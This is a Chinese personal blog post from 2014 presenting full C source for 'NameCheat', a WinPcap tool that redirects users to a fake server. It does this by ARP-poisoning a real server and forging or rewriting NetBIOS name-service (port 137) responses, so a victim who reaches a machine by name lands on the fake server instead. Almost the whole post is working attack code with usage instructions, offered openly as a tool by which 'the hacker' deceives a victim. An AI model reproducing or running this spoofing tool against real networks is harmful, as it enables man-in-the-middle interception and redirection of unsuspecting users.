注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

一个计算机名字欺骗程序  

2014-04-21 16:03:56|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

在目标未开机及开机的情况下,客户用计算机名访问目标的话,会被骗到假服务器那。

缺点就是,停止欺骗的话,客户要等个10分钟的样子才能连真服务器。

这个可能要研究137名称服务如何发主动注销计算机名字的方法了。

这个原理就是用ARP单播请求欺骗真服务器,客户ip对应黑客机的mac。

这样真服务器的数据就发到黑客机,然后修改再转发。。。

客户机这时用ip也不能和真服务器通讯了,直到恢复欺骗才可以用ip访问。

用名字的话等个10分钟后吧,。。。

// NameCheat.cpp

#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")

#include "proto.h"
#include "chksum.h"

// IP MAC对应表
typedef struct _IPMAC
{
 DWORD A; // 被害者的IP
 unsigned char a[6]; // 被害者的MAC

 DWORD B; // 真服务器的IP
 unsigned char b[6]; // 真服务器的MAC

 DWORD F; // 假服务器的IP
 unsigned char f[6]; // 假服务器的MAC

 DWORD H; // 黑客的IP
 unsigned char h[6]; // 黑客的MAC

} IPMAC, *PIPMAC;

// 目标的ARP缓存表
typedef struct _DESTARP
{
 DWORD DestIp; // 目标的IP
 unsigned char DestMac[6]; // 目标的MAC

 DWORD ArpIp; // 被欺骗的IP
 unsigned char ArpMacFalse[6]; // 不对应的假MAC
 unsigned char ArpMacTrue[6];  // 对应的真MAC
} DESTARP, *PDESTARP;

IPMAC t; // IP MAC对应表
DESTARP tA,tB,tF;

HANDLE hThread;

pcap_t *adhandle;

int count=0;
u_long if_addr;

unsigned char broadcast[6]={0xff,0xff,0xff,0xff,0xff,0xff}; // 广播MAC

unsigned char NB_Query[]={
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x08, 0x00, 0x45, 0x00,
0x00, 0x4E, 0x00, 0x44, 0x00, 0x00, 0x80, 0x11, 0xBC, 0x08, 0xC0, 0xA8, 0x7E, 0x02, 0xC0, 0xA8,
0x7E, 0xFF, 0x00, 0x89, 0x00, 0x89, 0x00, 0x3A, 0xBC, 0x6C, 0x80, 0x37, 0x01, 0x10, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01
};

unsigned char NB_Response[]={
0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x00, 0x50, 0x56, 0xC0, 0x00, 0x01, 0x08, 0x00, 0x45, 0x00,
0x00, 0x5A, 0x00, 0x31, 0x00, 0x00, 0x40, 0x11, 0xFD, 0x0D, 0xC0, 0xA8, 0x7E, 0x01, 0xC0, 0xA8,
0x7E, 0x02, 0x00, 0x89, 0x00, 0x89, 0x00, 0x46, 0x66, 0xCD, 0x80, 0x37, 0x85, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01, 0x00, 0x04, 0x93, 0xE0,
0x00, 0x06, 0x00, 0x00, 0xC0, 0xA8, 0x7E, 0x01
};

/*
void dumpbin(unsigned char *s,int n) //输出二进制内容
{
 int i;

 printf("===Begin Dump===");

 for (i=0;i<n;i++ )
 {
  if (i%16 == 0 )
  {
   printf("\n%04x: ",i);
  }
  printf("%02X ",*(s+i));
 }

 printf("\n");
 printf("===End Dump===\n");

}
*/

//
// 转换MAC字符串为MAC地址
//
BOOL MacStr2Bin(char *macstr,unsigned char *buff)
{
 char str[100];

 if (strlen(macstr)!=17)
 {
  printf("[-] Error %s len!=17\n",macstr);
  return FALSE;
 }

 for (int i=0;i<6 ;i++ )
 {
  sscanf(macstr+3*i,"%02x",str+i);
 }

 memcpy(buff, str, 6 );
 return TRUE;
}


// 0 1 2 3 4 5 6 7 8 9
//   A a B b F f H h
// 得到IP MAC对应表
void GetAllIPMac(char *v[])
{
 t.A = inet_addr( v[1] );
 MacStr2Bin(v[2], t.a);

 t.B = inet_addr( v[3] );
 MacStr2Bin(v[4], t.b);

 t.F = inet_addr( v[5] );
 MacStr2Bin(v[6], t.f);

 t.H = inet_addr( v[7] );
 MacStr2Bin(v[8], t.h);

}

// 0 1 2 3 4 5 6 7 8 9
//   A a B b F f H h
// 本机静态绑定IP MAC
void SetStatic(char *v[])
{
 char cmd[256];

 for (int i=1; i<9; i+=2)
 {
  // arp -s 1.1.1.1 11-22-33-44-55-66 1.1.1.1
  unsigned char *p;
  p = (unsigned char *) &if_addr;
  sprintf(cmd,"arp -s %s %s %d.%d.%d.%d\n", v[i], v[i+1], p[0],p[1],p[2],p[3]);
  //printf("%s\n",cmd);
  system(cmd);
 }
}

//
// 发送ARP请求数据包的欺骗线程
//
UINT CheatThread(LPVOID lparam)

 PDESTARP p = (PDESTARP)lparam;
 u_char ucFrame[ARP_LEN];

 // 设置Ethernet头
 ETHeader eh = { 0 };
 memcpy(eh.dhost, p->DestMac, 6);
 memcpy(eh.shost, t.h, 6);
 eh.type = htons(ETHERTYPE_ARP);
 memcpy(ucFrame, &eh, sizeof(eh));

 // 设置Arp头
 ARPHeader ah = { 0 };
 ah.hrd = htons(ARPHRD_ETHER);
 ah.eth_type = htons(ETHERTYPE_IP);
 ah.maclen = 6;
 ah.iplen = 4;
 ah.opcode = htons(ARP_REQUEST);

 memcpy(ah.smac, p->ArpMacFalse, 6); // 不对应的假MAC
 ah.saddr = p->ArpIp; // 被欺骗的IP
 memset(ah.dmac, 0x00, 6);
 ah.daddr = p->DestIp;

 memcpy(&ucFrame[sizeof(ETHeader)], &ah, sizeof(ah));

 while(1)
 {
  if(pcap_sendpacket(adhandle, (const unsigned char *) ucFrame,
   ARP_LEN) < 0)
  {
   printf("[-] Send Packet Error\n");
   return FALSE;
  }

  Sleep(3000); // Sleep 3 sec to restore arp cache
 }
 return TRUE; 
}

// 欺骗B不对应的IP MAC
void CheatArpCache()
{
 tB.DestIp = t.B;
 memcpy(tB.DestMac, t.b, 6);
 tB.ArpIp = t.A;
 memcpy(tB.ArpMacFalse, t.h, 6);
 memcpy(tB.ArpMacTrue, t.a, 6);
 hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);
}

//
//  修改、转发、数据包的例程
//  程序的核心部分
//
void ForwardPacket(pcap_t *adhandle, const u_char *pkt_data, unsigned int pkt_len)
{
 ETHeader *eh;
    IPHeader *ih;
    TCPHeader *th;
    UDPHeader *uh;
    u_int ip_len;
 char szSource[16],szDest[16];
    u_short sport, dport;

 eh = (ETHeader *) pkt_data;

 if(eh->type != htons(ETHERTYPE_IP)) return; // 只转发IP包

 ih = (IPHeader *) (pkt_data + 14); //找到IP头的位置,14为以太头的长度
 ip_len = (ih->iphVerLen & 0x0f) * 4;

 if (ih->ipProtocol == PROTO_UDP) // 处理UDP
 {
  uh = (UDPHeader *) ((u_char*)ih + ip_len); // 找到UDP的位置

  //
  // A<-B 方向处理
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0)
  {
   // B->A/b->h => F->A/h->a
   if (memcmp(eh->shost, t.b, 6) == 0 && uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900)
   {
    NBHeader *nh;

    nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

    // 修改来自B的137响应转发给A
    printf("[UDP] B->A/b->h => F->A/h->a\n");
    memcpy(eh->shost, t.h, 6);
    memcpy(eh->dhost, t.a, 6);

    ih->ipSource = t.F;

    nh->AddressIP = t.F; // 假服务器

    unsigned char *dataudp = (unsigned char *) ih + sizeof(IPHeader)
     + sizeof(UDPHeader);
    int lenudp = ntohs(ih->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

    ih->ipChecksum = 0;
    uh->checksum = 0;
    ih->ipChecksum = checksum((USHORT *)ih, sizeof(IPHeader));
    CalcUdpCheckSum(ih, uh, (char *)dataudp, lenudp);

    if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
    {
     printf("[-] Forward thread send packet error\n");
    }
   }

  }

  // 处理来自A的137查询广播包,如果未开机的情况会发3次来
  if (memcmp(eh->shost, t.a, 6) == 0 && memcmp(eh->dhost, broadcast, 6) == 0)
  {
   NBHeader *nh;
   nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

   if ( uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900 && nh->Flags==0x1001) // 137=0x0089
   {
    count++;
    if (count > 1)
    {
     ETHeader *eh1;
     IPHeader *ih1;
     UDPHeader *uh1;
     NBHeader *nh1;
     //NBHeader Response;

     eh1 = (ETHeader *) NB_Response;
     ih1 = (IPHeader *) (NB_Response+14);
     uh1 = (UDPHeader *) ((u_char*)ih1 + ip_len);;
     nh1 = (NBHeader *) ((u_char *)uh1 + sizeof(UDPHeader));

     // 修改以太网头
     printf("[UDP] A->*/a->* => F->A/h->a\n");
     memcpy(eh1->shost, t.h, 6);
     memcpy(eh1->dhost, t.a, 6);

     ih1->ipSource = t.F;  // 假服务器
     ih1->ipDestination = t.A;

     nh1->TransID = nh->TransID; // TransID
     memcpy(nh1->Name, nh->Name, 0x22); // A请求的计算机名
     nh1->AddressIP = t.F;  // 假服务器

     unsigned char *dataudp = (unsigned char *) ih1 + sizeof(IPHeader)
      + sizeof(UDPHeader);
     int lenudp = ntohs(ih1->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

     ih1->ipChecksum = 0;
     uh1->checksum = 0;
     ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));
     CalcUdpCheckSum(ih1, uh1, (char *)dataudp, lenudp);

     count=0;

     if (pcap_sendpacket(adhandle, (const unsigned char *) NB_Response, sizeof(NB_Response)) < 0)
     {
      printf("[-] Forward thread send packet error\n");
     }

    }
   }
  }
 }
 else // 其他协议处理,如ICMP...
 {
 }
}

//
// pcap_loop的回调函数
// 把接收到的数据传给ForwardPacket函数处理
//
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
 ForwardPacket(adhandle, pkt_data,header->len);
}

//
// 重置ARP欺骗,恢复受骗主机的ARP cache
//
void ResetSpoof()
{
 printf("[*] Reseting .....\n");

 TerminateThread(hThread, 0);

 memcpy(tB.ArpMacFalse, tB.ArpMacTrue, 6);
 hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 printf("[*] Sleep 5s ");
 for(int i = 0; i < 12; i++, Sleep(300))
   printf(".");
 printf("\n");
 TerminateThread(hThread, 0);
 
 system("arp -d\n");

 // pcap_breakloop后,所有对网卡的操作都会使用程序中止,切记
 pcap_breakloop(adhandle);
}


//
// 捕获控制台事件的函数,主要是处理程序中断事务
//
BOOL CtrlHandler( DWORD fdwCtrlType )
{
 switch (fdwCtrlType)
 {
 // Handle the CTRL-C signal.
    case CTRL_C_EVENT:
    case CTRL_CLOSE_EVENT:
    case CTRL_BREAK_EVENT: 
    case CTRL_LOGOFF_EVENT:
    case CTRL_SHUTDOWN_EVENT:
  ResetSpoof(); //  恢复欺骗主机的arp cache
  return TRUE;  
    default:
  return FALSE;
 }
}

/* From tcptraceroute, convert a numeric IP address to a string */
#define IPTOSBUFFERS 12
char *iptos(u_long in)
{
 static char output[IPTOSBUFFERS][3*4+3+1];
 static short which;
 u_char *p;

 p = (u_char *)&in;
 which = (which + 1 == IPTOSBUFFERS ? 0 : which + 1);
 sprintf(output[which], "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
 return output[which];
}

void ifprint(pcap_if_t *d)
{
  pcap_addr_t *a;
  char ip6str[128];

  /* Name */
  printf("%s\n",d->name);

  /* Description */
  if (d->description)
    printf("\tDescription: %s\n",d->description);

  /* Loopback Address*/
  printf("\tLoopback: %s\n",(d->flags & PCAP_IF_LOOPBACK)?"yes":"no");

  /* IP addresses */
  for(a=d->addresses;a;a=a->next) {
    printf("\tAddress Family: #%d\n",a->addr->sa_family);
 
    switch(a->addr->sa_family)
    {
      case AF_INET:
        printf("\tAddress Family Name: AF_INET\n");
        if (a->addr)
  {
   // 接口IP   
   if_addr =((struct sockaddr_in *)a->addr)->sin_addr.s_addr;
   printf("\tAddress: %s\n", iptos(if_addr));
  }
        if (a->netmask)
          printf("\tNetmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
        if (a->broadaddr)
          printf("\tBroadcast Address: %s\n",iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
        if (a->dstaddr)
          printf("\tDestination Address: %s\n",iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
        break;

   case AF_INET6:
       printf("\tAddress Family Name: AF_INET6\n");
  break;

   default:
        printf("\tAddress Family Name: Unknown\n");
        break;
    }
  }
  printf("\n");
}


int main(int argc, char *argv[])
{
 pcap_if_t *alldevs;
 pcap_if_t *d;
 int inum;
 int i=0;
 char errbuf[PCAP_ERRBUF_SIZE];

 printf("*** 名字欺骗 V1.0 ***\n");
 printf("*** 按下CTRL+C结束欺骗 ***\n");
 printf("*** hcper @ 2014.4.20修改 ***\n");

 if (argc != 9)
 {
  printf("帮助: %s A a B b F f H h\n", argv[0]);
  printf("说明: 黑客H欺骗A当他用名字访问B的时候实际上访问了F!\n");
  printf("大写字母表示IP,小写字母表示MAC\n\n");
  printf("例子: %s " \
    "192.168.10.1 11-11-11-11-11-11 " \
    "192.168.10.2 22-22-22-22-22-22 " \
    "192.168.10.3 33-33-33-33-33-33 " \
    "192.168.10.4 44-44-44-44-44-44\n", argv[0]);
  return 0;
 }
 
 /* Retrieve the device list */
 if(pcap_findalldevs(&alldevs, errbuf) == -1)
 {
  fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
  exit(1);
 }
 
 /* Print the list */
 for(d=alldevs; d; d=d->next)
 {
  printf("%d. %s\n", ++i, d->name);
  if (d->description)
   printf("\t(%s)\n\n", d->description);
  else
   printf("\t(No description available)\n\n");
 }
 
 if(i==0)
 {
  printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
  return -1;
 }
 
 printf("Enter the interface number (1-%d):",i);
 scanf("%d", &inum);
 
 if(inum < 1 || inum > i)
 {
  printf("\nInterface number out of range.\n");
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }
 
 /* Jump to the selected adapter */
 for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);


 /* Open the device */
 /* Open the adapter */
 if ((adhandle= pcap_open_live(d->name, // name of the device
        65536,   // portion of the packet to capture.
           // 65536 grants that the whole packet will be captured on all the MACs.
        1,    // promiscuous mode (nonzero means promiscuous)
        1000,   // read timeout
        errbuf   // error buffer
        )) == NULL)
 {
  fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }

 printf("\n接口信息:\n");
 ifprint(d);
 
 printf("\nlistening on %s...\n", d->description);

 SetConsoleCtrlHandler((PHANDLER_ROUTINE) CtrlHandler, TRUE);

 GetAllIPMac(argv); // 得到所有的相关IP与MAC

 SetStatic(argv); // 本机设置静态IP MAC对应表
 
 CheatArpCache(); // 欺骗ARP缓存
/*
 printf("t:\n");
 dumpbin((unsigned char *)&t, sizeof(t) ); // debug

 printf("tA:\n");
 dumpbin((unsigned char *)&tA, sizeof(tA) ); // debug

 printf("tB:\n");
 dumpbin((unsigned char *)&tB, sizeof(tB) ); // debug

 printf("tF:\n");
 dumpbin((unsigned char *)&tF, sizeof(tF) ); // debug

 Sleep(2000);
*/
 /* At this point, we don't need any more the device list. Free it */
 pcap_freealldevs(alldevs);

 /* start the capture */
 pcap_loop(adhandle, 0, packet_handler, NULL);
 
 pcap_close(adhandle);

 return 0;
}

  评论这张
 
阅读(290)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017